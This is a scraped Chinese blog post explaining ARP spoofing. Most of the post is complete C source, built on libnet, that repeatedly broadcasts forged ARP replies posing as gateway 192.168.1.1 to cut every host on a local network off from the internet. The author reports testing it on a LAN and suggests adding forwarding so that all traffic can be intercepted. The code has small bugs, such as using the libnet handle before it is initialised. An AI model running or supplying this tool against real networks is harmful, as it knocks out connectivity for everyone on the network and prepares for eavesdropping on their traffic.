侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

Linux下使用libnet实现ARP攻击

2022-06-28 星期二 / 0 评论 / 0 点赞 / 63 阅读 / 3564 字

闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包

    闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包, 广播包的目的是干嘛呢?很简单,欺骗内网的所有主机,告诉受害主机,“我”是网关。 内网机器接收到这种广播包之后,会刷新自己ARP缓存表,把网关的IP和广播包中的源MAC绑定。这样攻击机器就达到了冒充网关的目的。

    上次一所大学就是被ARP欺骗攻击,他们的学校主页一打开就会跳出其他很多乱七八糟的页面,,,,当时查看他们WEB服务器的源代码,发现没有被插入这些<iframe>会弹页面的代码,但是用浏览器外网访问的时候,这些代码就出现了,很明显网站的返回的客户端数据在途中被劫持修改了(插入了一些代码)。

    下面实现的就比较简单了,只做欺骗,不做转发,导致的后果就是局域网所有主机会断网。测试了一下,内网主机会无法上网,安了360ARP防护的会报警,能上网,就是网速有点慢,但是识别出了的攻击主机好像不准确,试了几次都识别成正常的电脑在攻击,不知道360这个识别是不是通过源MAC地址识别还是怎么识别。


#include "arp.h"int main(int argc,char **argv){	libnet_t *l;	int i,packet_size;		//发送的数据包的长度	libnet_ptag_t arp_tag,ether_tag;	char *device="eth0";	char err_buf[LIBNET_ERRBUF_SIZE];	char *destion_ip_str = "255.255.255.255";	char *source_ip_str = "192.168.1.1";	u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};	u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};	u_int32_t source_ip,destion_ip;	//将字符形式ip转换为网络字节序	source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);	destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);	//初始化libnet句柄	l = libnet_init(LIBNET_LINK,device,err_buf);	if(l == NULL){		printf("初始化libnet句柄失败:%s/n",err_buf);		exit(-1);	}	arp_tag = libnet_build_arp(		ARPHRD_ETHER,		//硬件地址类型,此处为以太网类型		ETHERTYPE_IP,		//协议地址类型		6,		4,		ARPOP_REPLY,		//ARP应答		source_hardware,		(u_int8_t *)&source_ip,		destion_hardware,		(u_int8_t *)&destion_ip,		NULL,		//无负载		0,			//负载长度为0		l,		0		//协议块标记,为0,表示新建协议块		);	ether_tag = libnet_build_ethernet(		(u_int8_t *)&destion_hardware,		(u_int8_t *)&source_hardware,		ETHERTYPE_ARP,		NULL,		0,		l,		0		);	i = 0;	while(1){		packet_size = libnet_write(l);		//发送构造的ARP数据包		usleep(10);		i++;	}	printf("数据包长度为:%d/n",packet_size);	libnet_destroy(l);	return 0;}



   目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。

    如果不想弄断网,只进行欺骗的话,数据发送过来之后,要进行转发到正确的网关,这样就保证内网网络正常,而且所有数据都被监听了(人太懒,不想写)~~~ 

广告 广告

评论区